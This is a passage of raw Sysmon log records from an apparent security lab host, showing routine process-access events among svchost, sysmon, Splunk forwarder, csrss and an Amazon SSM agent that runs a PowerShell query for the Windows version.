12:01:03.645{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002388Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:03.645{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002387Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:03.645{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002386Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:03.645{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002385Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:03.645{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002384Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:03.645{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002383Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:03.645{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002382Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:03.645{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002381Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:03.645{266CAFBE-6469-6064-0500-00000000AE01}6242352C:\Windows\system32\csrss.exe{266CAFBE-647F-6064-5100-00000000AE01}4000C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002380Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:03.645{266CAFBE-647F-6064-4E00-00000000AE01}29042688C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe{266CAFBE-647F-6064-5100-00000000AE01}4000C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4022c|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+403f8|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+404c7|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+40fee|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+64ab|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1807c|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002379Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:03.656{266CAFBE-647F-6064-5100-00000000AE01}4000C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" check-licenseC:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{266CAFBE-647F-6064-4E00-00000000AE01}2904C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt 10341000x80000000000000002378Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:03.612{266CAFBE-647F-6064-4F00-00000000AE01}32323220C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE{266CAFBE-647D-6064-2F00-00000000AE01}2796C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e675|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e1a6|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f344c|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f2a91|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+19fdb50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002377Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:03.415{266CAFBE-647E-6064-4800-00000000AE01}40763036C:\Windows\system32\conhost.exe{266CAFBE-647F-6064-5000-00000000AE01}3024C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002376Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:03.414{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002375Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:03.413{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002374Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:03.413{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002373Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:03.413{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002372Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:03.413{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002371Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:03.413{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002370Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:03.413{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002369Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:03.413{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002368Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:03.413{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002367Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:03.412{266CAFBE-6469-6064-0500-00000000AE01}624640C:\Windows\system32\csrss.exe{266CAFBE-647F-6064-5000-00000000AE01}3024C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002366Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:03.412{266CAFBE-647E-6064-4300-00000000AE01}39243892C:\Program Files\Amazon\SSM\ssm-agent-worker.exe{266CAFBE-647F-6064-5000-00000000AE01}3024C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Amazon\SSM\ssm-agent-worker.exe+5d9ee 154100x80000000000000002365Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:03.412{266CAFBE-647F-6064-5000-00000000AE01}3024C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEpowershell "Get-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion'" "| Select-Object" "ProductName, BuildLabEx, CurrentMajorVersionNumber, CurrentMinorVersionNumber" "| ConvertTo-Json -Depth 3"C:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{266CAFBE-647E-6064-4300-00000000AE01}3924C:\Program Files\Amazon\SSM\ssm-agent-worker.exe"C:\Program Files\Amazon\SSM\ssm-agent-worker.exe" 10341000x80000000000000002364Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:03.362{266CAFBE-647E-6064-3D00-00000000AE01}37963816C:\Windows\system32\conhost.exe{266CAFBE-647F-6064-4F00-00000000AE01}3232C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002363Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:03.362{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002362Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 